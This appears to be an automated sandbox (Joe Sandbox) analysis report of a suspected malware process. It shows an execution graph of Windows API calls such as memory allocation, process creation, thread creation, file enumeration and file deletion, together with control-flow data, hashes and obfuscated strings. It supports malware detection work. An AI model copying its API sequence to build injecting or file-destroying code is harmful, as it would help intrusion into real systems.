                                                                            execution_graph 98427 30c8b87 98428 30c8b8a 98427->98428 98429 30c8b41 98428->98429 98431 30c7430 98428->98431 98432 30c7446 98431->98432 98434 30c747f 98431->98434 98432->98434 98435 30c72a0 LdrLoadDll 98432->98435 98434->98429 98435->98434 98436 30c2a87 98437 30c2aeb 98436->98437 98440 30c2a8d 98436->98440 98439 30c2b13 98437->98439 98442 30c6650 98437->98442 98449 30c48d0 98440->98449 98443 30c6683 98442->98443 98444 30c66a7 98443->98444 98453 30d9400 98443->98453 98444->98439 98446 30c66ca 98446->98444 98457 30d98a0 98446->98457 98448 30c674a 98448->98439 98450 30c48f4 98449->98450 98451 30c48fb 98450->98451 98452 30c4930 LdrLoadDll 98450->98452 98451->98437 98452->98451 98454 30d941a 98453->98454 98460 4ff2ca0 LdrInitializeThunk 98454->98460 98455 30d9446 98455->98446 98458 30d98bd 98457->98458 98459 30d98ce NtClose 98458->98459 98459->98448 98460->98455 98461 30cc980 98463 30cc9a9 98461->98463 98462 30ccaac 98463->98462 98464 30cca4e FindFirstFileW 98463->98464 98464->98462 98467 30cca69 98464->98467 98465 30cca93 FindNextFileW 98466 30ccaa5 FindClose 98465->98466 98465->98467 98466->98462 98467->98465 98662 30cb0c0 98667 30cadd0 98662->98667 98664 30cb0cd 98681 30caa40 98664->98681 98666 30cb0e9 98668 30cadf5 98667->98668 98692 30c86e0 98668->98692 98671 30caf40 98671->98664 98673 30caf57 98673->98664 98674 30caf4e 98674->98673 98676 30cb045 98674->98676 98711 30ca490 98674->98711 98677 30cb0aa 98676->98677 98720 30ca800 98676->98720 98679 30db950 RtlFreeHeap 98677->98679 98680 30cb0b1 98679->98680 98680->98664 98682 30caa56 98681->98682 98689 30caa61 98681->98689 98683 30dba30 RtlAllocateHeap 98682->98683 98683->98689 98684 30caa88 98684->98666 98685 30c86e0 GetFileAttributesW 98685->98689 98686 30cada5 98687 30cadbe 98686->98687 98688 30db950 RtlFreeHeap 98686->98688 98687->98666 98688->98687 98689->98684 98689->98685 98689->98686 98690 30ca490 RtlFreeHeap 98689->98690 98691 30ca800 RtlFreeHeap 98689->98691 98690->98689 98691->98689 98693 30c86fe 98692->98693 98694 30c8710 98693->98694 98695 30c8705 GetFileAttributesW 98693->98695 98694->98671 98696 30d3730 98694->98696 98695->98694 98697 30d373e 98696->98697 98698 30d3745 98696->98698 98697->98674 98699 30c48d0 LdrLoadDll 98698->98699 98700 30d377a 98699->98700 98701 30d3789 98700->98701 98724 30d31f0 LdrLoadDll 98700->98724 98703 30dba30 RtlAllocateHeap 98701->98703 98707 30d3937 98701->98707 98704 30d37a2 98703->98704 98705 30d392d 98704->98705 98704->98707 98709 30d37be 98704->98709 98706 30db950 RtlFreeHeap 98705->98706 98705->98707 98706->98707 98707->98674 98708 30db950 RtlFreeHeap 98710 30d3921 98708->98710 98709->98707 98709->98708 98710->98674 98712 30ca4b6 98711->98712 98725 30cdf00 98712->98725 98714 30ca528 98716 30ca6b0 98714->98716 98717 30ca546 98714->98717 98715 30ca695 98715->98674 98716->98715 98718 30ca350 RtlFreeHeap 98716->98718 98717->98715 98730 30ca350 98717->98730 98718->98716 98721 30ca826 98720->98721 98722 30cdf00 RtlFreeHeap 98721->98722 98723 30ca8ad 98722->98723 98723->98676 98724->98701 98727 30cdf12 98725->98727 98726 30cdf31 98726->98714 98727->98726 98728 30db950 RtlFreeHeap 98727->98728 98729 30cdf74 98728->98729 98729->98714 98731 30ca36d 98730->98731 98734 30cdf90 98731->98734 98733 30ca473 98733->98717 98735 30cdfb4 98734->98735 98736 30ce05e 98735->98736 98737 30db950 RtlFreeHeap 98735->98737 98736->98733 98737->98736 98468 30d9700 98469 30d97a4 98468->98469 98471 30d9728 98468->98471 98470 30d97ba NtReadFile 98469->98470 98472 30c2681 98473 30c261e 98472->98473 98474 30c2685 98472->98474 98475 30c2646 98473->98475 98479 30d8ee0 98473->98479 98474->98474 98483 30d9940 98475->98483 98478 30c265b 98480 30d8efd 98479->98480 98488 4ff2c0a 98480->98488 98481 30d8f29 98481->98475 98484 30d99cf 98483->98484 98485 30d996b 98483->98485 98491 4ff2e80 LdrInitializeThunk 98484->98491 98485->98478 98486 30d9a00 98486->98478 98489 4ff2c1f LdrInitializeThunk 98488->98489 98490 4ff2c11 98488->98490 98489->98481 98490->98481 98491->98486 98738 30d1b40 98739 30d1b5c 98738->98739 98740 30d1b98 98739->98740 98741 30d1b84 98739->98741 98742 30d98a0 NtClose 98740->98742 98743 30d98a0 NtClose 98741->98743 98744 30d1ba1 98742->98744 98745 30d1b8d 98743->98745 98748 30dba70 RtlAllocateHeap 98744->98748 98747 30d1bac 98748->98747 98493 30c3483 98498 30c80f0 98493->98498 98496 30c34af 98497 30d98a0 NtClose 98497->98496 98499 30c810a 98498->98499 98503 30c3493 98498->98503 98504 30d8f80 98499->98504 98502 30d98a0 NtClose 98502->98503 98503->98496 98503->98497 98505 30d8f9a 98504->98505 98508 4ff35c0 LdrInitializeThunk 98505->98508 98506 30c81da 98506->98502 98508->98506 98749 30c5fc3 98750 30c5fcb 98749->98750 98751 30c5f56 98749->98751 98752 30c8470 LdrInitializeThunk 98751->98752 98753 30c5f70 98752->98753 98755 30c5f9c 98753->98755 98756 30c83f0 98753->98756 98757 30c8434 98756->98757 98762 30c8455 98757->98762 98763 30d8bb0 98757->98763 98759 30c8445 98760 30c8461 98759->98760 98761 30d98a0 NtClose 98759->98761 98760->98753 98761->98762 98762->98753 98764 30d8c2d 98763->98764 98765 30d8bdb 98763->98765 98768 4ff4650 LdrInitializeThunk 98764->98768 98765->98759 98766 30d8c52 98766->98759 98768->98766 98769 30bb850 98770 30bb853 98769->98770 98773 30db8c0 98770->98773 98772 30bcec1 98776 30d9a10 98773->98776 98775 30db8f1 98775->98772 98777 30d9aa5 98776->98777 98779 30d9a3b 98776->98779 98778 30d9abb NtAllocateVirtualMemory 98777->98778 98778->98775 98779->98775 98509 30c7110 98510 30c713a 98509->98510 98513 30c82a0 98510->98513 98512 30c7164 98514 30c82bd 98513->98514 98520 30d8fd0 98514->98520 98516 30c830d 98517 30c8314 98516->98517 98525 30d90b0 98516->98525 98517->98512 98519 30c833d 98519->98512 98521 30d8ff8 98520->98521 98522 30d9068 98520->98522 98521->98516 98530 4ff2f30 LdrInitializeThunk 98522->98530 98523 30d90a1 98523->98516 98526 30d9161 98525->98526 98528 30d90df 98525->98528 98531 4ff2d10 LdrInitializeThunk 98526->98531 98527 30d91a6 98527->98519 98528->98519 98530->98523 98531->98527 98532 30c7690 98533 30c76a8 98532->98533 98535 30c7702 98532->98535 98533->98535 98536 30cb5f0 98533->98536 98538 30cb616 98536->98538 98537 30cb846 98537->98535 98538->98537 98563 30d9ca0 98538->98563 98540 30cb689 98540->98537 98566 30dcb20 98540->98566 98542 30cb6a8 98542->98537 98543 30cb77f 98542->98543 98544 30d8ee0 LdrInitializeThunk 98542->98544 98546 30c5ec0 LdrInitializeThunk 98543->98546 98547 30cb79e 98543->98547 98545 30cb70a 98544->98545 98545->98543 98551 30cb713 98545->98551 98546->98547 98549 30cb82e 98547->98549 98579 30d8a50 98547->98579 98548 30cb767 98575 30c8470 98548->98575 98556 30c8470 LdrInitializeThunk 98549->98556 98550 30cb745 98594 30d4b60 LdrInitializeThunk 98550->98594 98551->98537 98551->98548 98551->98550 98572 30c5ec0 98551->98572 98559 30cb83c 98556->98559 98558 30cb805 98584 30d8b00 98558->98584 98559->98535 98561 30cb81f 98589 30d8c60 98561->98589 98564 30d9cba 98563->98564 98565 30d9ccb CreateProcessInternalW 98564->98565 98565->98540 98567 30dca90 98566->98567 98570 30dcaed 98567->98570 98595 30dba30 98567->98595 98569 30dcaca 98598 30db950 98569->98598 98570->98542 98573 30c5efe 98572->98573 98574 30d90b0 LdrInitializeThunk 98572->98574 98573->98550 98574->98573 98576 30c8483 98575->98576 98607 30d8de0 98576->98607 98578 30c84ae 98578->98535 98580 30d8aca 98579->98580 98581 30d8a78 98579->98581 98613 4ff39b0 LdrInitializeThunk 98580->98613 98581->98558 98582 30d8aef 98582->98558 98585 30d8b7d 98584->98585 98586 30d8b2b 98584->98586 98614 4ff4340 LdrInitializeThunk 98585->98614 98586->98561 98587 30d8ba2 98587->98561 98590 30d8cdd 98589->98590 98591 30d8c8b 98589->98591 98615 4ff2fb0 LdrInitializeThunk 98590->98615 98591->98549 98592 30d8d02 98592->98549 98594->98548 98601 30d9bc0 98595->98601 98597 30dba4b 98597->98569 98604 30d9c10 98598->98604 98600 30db969 98600->98570 98602 30d9bda 98601->98602 98603 30d9beb RtlAllocateHeap 98602->98603 98603->98597 98605 30d9c2d 98604->98605 98606 30d9c3e RtlFreeHeap 98605->98606 98606->98600 98608 30d8e5b 98607->98608 98610 30d8e08 98607->98610 98612 4ff2dd0 LdrInitializeThunk 98608->98612 98609 30d8e80 98609->98578 98610->98578 98612->98609 98613->98582 98614->98587 98615->98592 98616 30d8d10 98617 30d8d9c 98616->98617 98618 30d8d38 98616->98618 98621 4ff2ee0 LdrInitializeThunk 98617->98621 98619 30d8dcd 98621->98619 98622 30d9590 98623 30d9647 98622->98623 98625 30d95bf 98622->98625 98624 30d965d NtCreateFile 98623->98624 98626 30d8e90 98627 30d8ead 98626->98627 98630 4ff2df0 LdrInitializeThunk 98627->98630 98628 30d8ed5 98630->98628 98780 30dca50 98781 30db950 RtlFreeHeap 98780->98781 98782 30dca65 98781->98782 98783 30d6450 98784 30d64aa 98783->98784 98786 30d64b7 98784->98786 98787 30d3e70 98784->98787 98788 30db8c0 NtAllocateVirtualMemory 98787->98788 98790 30d3eb1 98788->98790 98789 30d3fae 98789->98786 98790->98789 98791 30c48d0 LdrLoadDll 98790->98791 98793 30d3eee 98791->98793 98792 30d3f30 Sleep 98792->98793 98793->98789 98793->98792 98794 30b9ee7 98795 30b9ed2 CreateThread 98794->98795 98797 30b9eed 98794->98797 98798 30ba614 98797->98798 98799 30db5b0 98797->98799 98800 30db5d6 98799->98800 98805 30b4110 98800->98805 98802 30db5e2 98803 30db61b 98802->98803 98808 30d59e0 98802->98808 98803->98798 98807 30b411d 98805->98807 98812 30c3580 98805->98812 98807->98802 98809 30d5a41 98808->98809 98811 30d5a4e 98809->98811 98823 30c1d50 98809->98823 98811->98803 98813 30c359a 98812->98813 98815 30c35b3 98813->98815 98816 30da310 98813->98816 98815->98807 98818 30da32a 98816->98818 98817 30da359 98817->98815 98818->98817 98819 30d8ee0 LdrInitializeThunk 98818->98819 98820 30da3b5 98819->98820 98821 30db950 RtlFreeHeap 98820->98821 98822 30da3ce 98821->98822 98822->98815 98824 30c1d8b 98823->98824 98839 30c8200 98824->98839 98826 30c1d93 98827 30c206d 98826->98827 98828 30dba30 RtlAllocateHeap 98826->98828 98827->98811 98829 30c1da9 98828->98829 98830 30dba30 RtlAllocateHeap 98829->98830 98831 30c1db7 98830->98831 98832 30dba30 RtlAllocateHeap 98831->98832 98834 30c1dc5 98832->98834 98838 30c1e62 98834->98838 98854 30c6db0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98834->98854 98835 30c48d0 LdrLoadDll 98836 30c2022 98835->98836 98850 30d8320 98836->98850 98838->98835 98840 30c822c 98839->98840 98841 30c80f0 2 API calls 98840->98841 98842 30c824f 98841->98842 98843 30c8259 98842->98843 98846 30c8271 98842->98846 98844 30c8264 98843->98844 98847 30d98a0 NtClose 98843->98847 98844->98826 98845 30c828d 98845->98826 98846->98845 98848 30d98a0 NtClose 98846->98848 98847->98844 98849 30c8283 98848->98849 98849->98826 98851 30d8381 98850->98851 98853 30d838e 98851->98853 98855 30c2080 98851->98855 98853->98827 98854->98838 98871 30c84d0 98855->98871 98857 30c20a0 98866 30c25f6 98857->98866 98875 30d1500 98857->98875 98860 30c22b4 98862 30dcb20 2 API calls 98860->98862 98861 30c20fe 98861->98866 98878 30dc9f0 98861->98878 98864 30c22c9 98862->98864 98863 30c2316 98865 30c8470 LdrInitializeThunk 98863->98865 98863->98866 98869 30c0ba0 LdrInitializeThunk 98863->98869 98864->98863 98883 30c0ba0 98864->98883 98865->98863 98866->98853 98868 30c8470 LdrInitializeThunk 98870 30c246a 98868->98870 98869->98863 98870->98863 98870->98868 98872 30c84dd 98871->98872 98873 30c84fb SetErrorMode 98872->98873 98874 30c8502 98872->98874 98873->98874 98874->98857 98876 30db8c0 NtAllocateVirtualMemory 98875->98876 98877 30d1521 98876->98877 98877->98861 98879 30dca06 98878->98879 98880 30dca00 98878->98880 98881 30dba30 RtlAllocateHeap 98879->98881 98880->98860 98882 30dca2c 98881->98882 98882->98860 98886 30d9b30 98883->98886 98887 30d9b4a 98886->98887 98890 4ff2c70 LdrInitializeThunk 98887->98890 98888 30c0bc2 98888->98870 98890->98888 98891 30d1ee0 98892 30d1ef9 98891->98892 98893 30d1f44 98892->98893 98896 30d1f87 98892->98896 98898 30d1f8c 98892->98898 98894 30db950 RtlFreeHeap 98893->98894 98895 30d1f54 98894->98895 98897 30db950 RtlFreeHeap 98896->98897 98897->98898 98643 4ff2ad0 LdrInitializeThunk 98899 30c9f7f 98900 30c9f96 98899->98900 98901 30c9f9b 98899->98901 98902 30c9fcd 98901->98902 98903 30db950 RtlFreeHeap 98901->98903 98903->98902 98904 30c117b PostThreadMessageW 98905 30c118d 98904->98905 98906 30c5cf6 98907 30c5cf4 98906->98907 98907->98906 98908 30c5e62 98907->98908 98909 30c5e5f 98907->98909 98912 30c5eb4 98907->98912 98910 30d98a0 NtClose 98909->98910 98911 30c5e9f 98910->98911 98913 30d90b0 LdrInitializeThunk 98912->98913 98914 30c5efe 98913->98914 98915 30b9ef0 98916 30ba242 98915->98916 98917 30ba614 98916->98917 98918 30db5b0 13 API calls 98916->98918 98918->98917 98644 30c74b0 98645 30c74cc 98644->98645 98653 30c751c 98644->98653 98647 30d98a0 NtClose 98645->98647 98645->98653 98646 30c764b 98648 30c74e7 98647->98648 98654 30c68e0 NtClose LdrInitializeThunk LdrInitializeThunk 98648->98654 98650 30c762b 98650->98646 98656 30c6ab0 NtClose LdrInitializeThunk LdrInitializeThunk 98650->98656 98653->98646 98655 30c68e0 NtClose LdrInitializeThunk LdrInitializeThunk 98653->98655 98654->98653 98655->98650 98656->98646 98919 30cfbf0 98920 30cfc54 98919->98920 98921 30c6650 2 API calls 98920->98921 98923 30cfd87 98921->98923 98922 30cfd8e 98923->98922 98948 30c6760 98923->98948 98925 30cfe0a 98926 30cff42 98925->98926 98945 30cff33 98925->98945 98952 30cf9d0 98925->98952 98927 30d98a0 NtClose 98926->98927 98929 30cff4c 98927->98929 98930 30cfe46 98930->98926 98931 30cfe51 98930->98931 98932 30dba30 RtlAllocateHeap 98931->98932 98933 30cfe7a 98932->98933 98934 30cfe99 98933->98934 98935 30cfe83 98933->98935 98961 30cf8c0 CoInitialize 98934->98961 98936 30d98a0 NtClose 98935->98936 98938 30cfe8d 98936->98938 98939 30cfea7 98964 30d9350 98939->98964 98941 30cff22 98942 30d98a0 NtClose 98941->98942 98943 30cff2c 98942->98943 98944 30db950 RtlFreeHeap 98943->98944 98944->98945 98946 30cfec5 98946->98941 98947 30d9350 LdrInitializeThunk 98946->98947 98947->98946 98949 30c6785 98948->98949 98968 30d91f0 98949->98968 98953 30cf9ec 98952->98953 98954 30c48d0 LdrLoadDll 98953->98954 98956 30cfa0a 98954->98956 98955 30cfa13 98955->98930 98956->98955 98957 30c48d0 LdrLoadDll 98956->98957 98958 30cfade 98957->98958 98959 30c48d0 LdrLoadDll 98958->98959 98960 30cfb3b 98958->98960 98959->98960 98960->98930 98963 30cf925 98961->98963 98962 30cf9bb CoUninitialize 98962->98939 98963->98962 98965 30d936d 98964->98965 98973 4ff2ba0 LdrInitializeThunk 98965->98973 98966 30d939d 98966->98946 98969 30d920d 98968->98969 98972 4ff2c60 LdrInitializeThunk 98969->98972 98970 30c67f9 98970->98925 98972->98970 98973->98966 98974 30d97f0 98975 30d986a 98974->98975 98977 30d981f 98974->98977 98976 30d9880 NtDeleteFile 98975->98976 98978 30d04f0 98979 30d050d 98978->98979 98980 30c48d0 LdrLoadDll 98979->98980 98981 30d052b 98980->98981

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 120 30b9ef0-30ba240 121 30ba251-30ba25a 120->121 122 30ba26e 121->122 123 30ba25c-30ba26c 121->123 125 30ba275-30ba27c 122->125 123->121 126 30ba27e-30ba290 125->126 127 30ba2a6-30ba2b7 125->127 128 30ba292-30ba296 126->128 129 30ba297-30ba299 126->129 130 30ba2c8-30ba2d4 127->130 128->129 131 30ba29b-30ba2a1 129->131 132 30ba2a4 129->132 133 30ba2e6 130->133 134 30ba2d6-30ba2dc 130->134 131->132 132->125 137 30ba2ed-30ba306 133->137 135 30ba2de-30ba2e1 134->135 136 30ba2e4 134->136 135->136 136->130 137->137 139 30ba308-30ba311 137->139 140 30ba552-30ba55c 139->140 141 30ba317-30ba323 139->141 142 30ba56d-30ba576 140->142 143 30ba342-30ba34b 141->143 144 30ba325-30ba340 141->144 147 30ba578-30ba584 142->147 148 30ba586-30ba58a 142->148 145 30ba34d-30ba365 143->145 146 30ba367-30ba37a 143->146 144->141 145->143 149 30ba38b-30ba394 146->149 147->142 151 30ba58c-30ba593 148->151 152 30ba596-30ba5a0 148->152 153 30ba396-30ba3a2 149->153 154 30ba3a4-30ba3ae 149->154 151->152 155 30ba5b1-30ba5bd 152->155 153->149 159 30ba3bf-30ba3c8 154->159 156 30ba5bf-30ba5d2 155->156 157 30ba5d4-30ba5db 155->157 156->155 161 30ba5dd-30ba5e1 157->161 162 30ba614-30ba61b 157->162 163 30ba3ca-30ba3d3 159->163 164 30ba3e0-30ba3ef 159->164 165 30ba60f call 30db5b0 161->165 166 30ba5e3-30ba60d 161->166 167 30ba61d-30ba650 162->167 168 30ba652-30ba65c 162->168 169 30ba3de 163->169 170 30ba3d5-30ba3db 163->170 171 30ba4bf-30ba4d3 164->171 172 30ba3f5-30ba3ff 164->172 165->162 166->161 167->162 174 30ba66d-30ba676 168->174 169->159 170->169 176 30ba4e4-30ba4f0 171->176 177 30ba410-30ba41c 172->177 178 30ba678-30ba681 174->178 179 30ba68e-30ba697 174->179 180 30ba508-30ba512 176->180 181 30ba4f2-30ba4fb 176->181 182 30ba41e-30ba42b 177->182 183 30ba42d-30ba437 177->183 187 30ba68c 178->187 188 30ba683-30ba689 178->188 189 30ba699-30ba6b4 179->189 190 30ba6b6-30ba6c0 179->190 184 30ba523-30ba52f 180->184 191 30ba4fd-30ba503 181->191 192 30ba506 181->192 182->177 185 30ba448-30ba454 183->185 194 30ba54d 184->194 195 30ba531-30ba53d 184->195 196 30ba46a-30ba474 185->196 197 30ba456-30ba468 185->197 187->174 188->187 189->179 191->192 192->176 194->139 200 30ba54b 195->200 201 30ba53f-30ba545 195->201 199 30ba485-30ba48e 196->199 197->185 203 30ba49f-30ba4b8 199->203 204 30ba490-30ba49d 199->204 200->184 201->200 203->203 206 30ba4ba 203->206 204->199 206->140
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #$&J$0$4$4$4$$<;$<m$N=$NI$P$SK$Y$c>$d$e$$jB$jG$l$n$sn$u$xs$z^jB$#$~
                                                                            • API String ID: 0-1260726500
                                                                            • Opcode ID: 2f5631f62cc9ab2d37fac11952d4e344aebb5dd58b95b9f2c96a1ea1f5aa60ad
                                                                            • Instruction ID: ba2be5351e8f0ba98751e48d92742978566c07740c10070c44dfd2d6f5408b4a
                                                                            • Opcode Fuzzy Hash: 2f5631f62cc9ab2d37fac11952d4e344aebb5dd58b95b9f2c96a1ea1f5aa60ad
                                                                            • Instruction Fuzzy Hash: 86229FB0E05268CBEB24CF45C994BDDBBB1BF44308F1085D9D549AB280DBB95E89CF64
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 030CCA5F
                                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 030CCA9E
                                                                            • FindClose.KERNELBASE(?), ref: 030CCAA9
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 3541575487-0
                                                                            • Opcode ID: 0eb3f14c97ecc0e8090ecc047a6b0a7c66f012a122ec9c6dd3e71f3315d56bfe
                                                                            • Instruction ID: 9d24f7ae88868209db0f672f53ac88c08834a7399c1ee41268c9eed3e82e1f8f
                                                                            • Opcode Fuzzy Hash: 0eb3f14c97ecc0e8090ecc047a6b0a7c66f012a122ec9c6dd3e71f3315d56bfe
                                                                            • Instruction Fuzzy Hash: C2316375911349BBEB20DF64CC89FEF77BCAF84704F14455DB909AB180DA70AA85CBA0
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 030D968E
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 1d980ee68297e093b9d09454ef77260a3d827c672f45c980b1ddf3436240fd61
                                                                            • Instruction ID: c0b6d8d64276c7bcf8d0ce1608d63eaedc57741441342708710e41aea0fff6f7
                                                                            • Opcode Fuzzy Hash: 1d980ee68297e093b9d09454ef77260a3d827c672f45c980b1ddf3436240fd61
                                                                            • Instruction Fuzzy Hash: 5F31D2B5A01248AFCB14DF98D881EEEB7F9EF8C310F108219F919A7340D770A941CBA5
                                                                            APIs
                                                                            • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 030D97E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 7894f5e172da81d415dc74cbb1cb8de4d35580a2dc344769630951a9b12c7089
                                                                            • Instruction ID: 1451eddfc1f889eb6023079430db7fb2ef3a45c97d36e3043c7b7e34da1e8231
                                                                            • Opcode Fuzzy Hash: 7894f5e172da81d415dc74cbb1cb8de4d35580a2dc344769630951a9b12c7089
                                                                            • Instruction Fuzzy Hash: 0D31E6B5A01249AFCB14DF98D981EEFB7F9EF88314F008219FD19A7240D770A9118BA5
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(030C20FE,?,030D838E,00000000,00000004,00003000,?,?,?,?,?,030D838E,030C20FE,030D838E,89CC4589,030C20FE), ref: 030D9AD8
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: 1811d8ade43edb4bb4022eedc635174e8bf529350d1383489e10df948278cad0
                                                                            • Instruction ID: b89858f4eec7907cd84655325d758d2cfb70d1b269abb6fa604656faed6fcf35
                                                                            • Opcode Fuzzy Hash: 1811d8ade43edb4bb4022eedc635174e8bf529350d1383489e10df948278cad0
                                                                            • Instruction Fuzzy Hash: A621F9B5A11249AFDB14DF98D841EEFB7B9EF88710F008119FD19AB240D770A911CBA5
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeleteFile
                                                                            • String ID:
                                                                            • API String ID: 4033686569-0
                                                                            • Opcode ID: defb8a24c5224e5bb6cc7739e7a1daa64279ef62ac2569a9b6a04582bc931386
                                                                            • Instruction ID: 41b2b93479c966f61ed0f35e2f480927813c69b5402ef717f999919b8f7359e6
                                                                            • Opcode Fuzzy Hash: defb8a24c5224e5bb6cc7739e7a1daa64279ef62ac2569a9b6a04582bc931386
                                                                            • Instruction Fuzzy Hash: 6411A375A417447FD610EB98CC41FEFB3ACDF84710F004159F909AB240E770750587A5
                                                                            APIs
                                                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 030D98D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: ddf1df0a587fa80aea2360bb6993480b23bf9f2a8d51c71cb37594c8d390c493
                                                                            • Instruction ID: ee22a99872ea6d0fa24a31ee96c703834d5d799f26408d5bc86253fe545b102a
                                                                            • Opcode Fuzzy Hash: ddf1df0a587fa80aea2360bb6993480b23bf9f2a8d51c71cb37594c8d390c493
                                                                            • Instruction Fuzzy Hash: D1E046362413547BD620EA5ACC40FDB77ACDFC5764F004115FA08AB241CB71B9018BB4
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: e4f31d1fc23d9833ae06fa1b494894aade5a34cc494a8f928ce954efd8a79443
                                                                            • Instruction ID: 45eba7660dc67bf75c178a07bb17950001a0f9c663306b7a6751fc2f6427be43
                                                                            • Opcode Fuzzy Hash: e4f31d1fc23d9833ae06fa1b494894aade5a34cc494a8f928ce954efd8a79443
                                                                            • Instruction Fuzzy Hash: 689002626019108261407158984440A6015ABE23017D5D115A05545A4C861889559269
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 1f4b67a7d0dbcc7a05f16ac4cc6c395ead0ffb7614d46b293091aed45db9d3bb
                                                                            • Instruction ID: 855f153d0870f7bfada70072ae1be780c78913c13a56fdc9a5f86405836c572a
                                                                            • Opcode Fuzzy Hash: 1f4b67a7d0dbcc7a05f16ac4cc6c395ead0ffb7614d46b293091aed45db9d3bb
                                                                            • Instruction Fuzzy Hash: F0900232605C1052B140715898C454A4015ABE1301F95D011E0424598C8A148A565361
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 1f97e7dfcb22a3bc6c53eeeaaa5f28ed75f17e3437f6e437eb72f302a4e552b5
